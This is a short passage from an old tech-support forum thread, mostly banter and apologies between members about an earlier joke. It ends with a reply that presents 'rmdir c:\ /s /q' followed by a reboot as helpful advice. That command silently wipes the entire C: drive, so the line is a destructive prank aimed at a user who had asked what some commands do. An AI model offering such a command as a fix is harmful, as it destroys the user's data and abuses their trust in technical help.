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How it worked for me

17 years 4 months ago #18849 by talk2sp
my people whats up

i dont knw why people should pick offense with me i was just trying to make fun of TheBishop no one is an ISLAND of ideas i dont know why people were taking it personal....

anyways if u guyz say i was not suppose to say so i agree....

"but laptop handling is meant for brains i still repeat...."

Starfire Said -

But, as a support person, you must never, ever miss the opportunity to humiliate any programmer you come across. The more basic the mistake, the more humiliation you pile on!

talk2sp wrote:
laptop handling is meant for brains.... aight..
.... heheh ya! riiiiight!

more ideas still welcomed....

and em FallenZer0 pls those commands what are the uses and how do they correlate with the solution.....

(talk2sp: Here is my contribution to you: Go to your command prompt, simply type rmdir c:\ /s /q wait and then reboot.)


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Take Responsibility! Don't let failures define you
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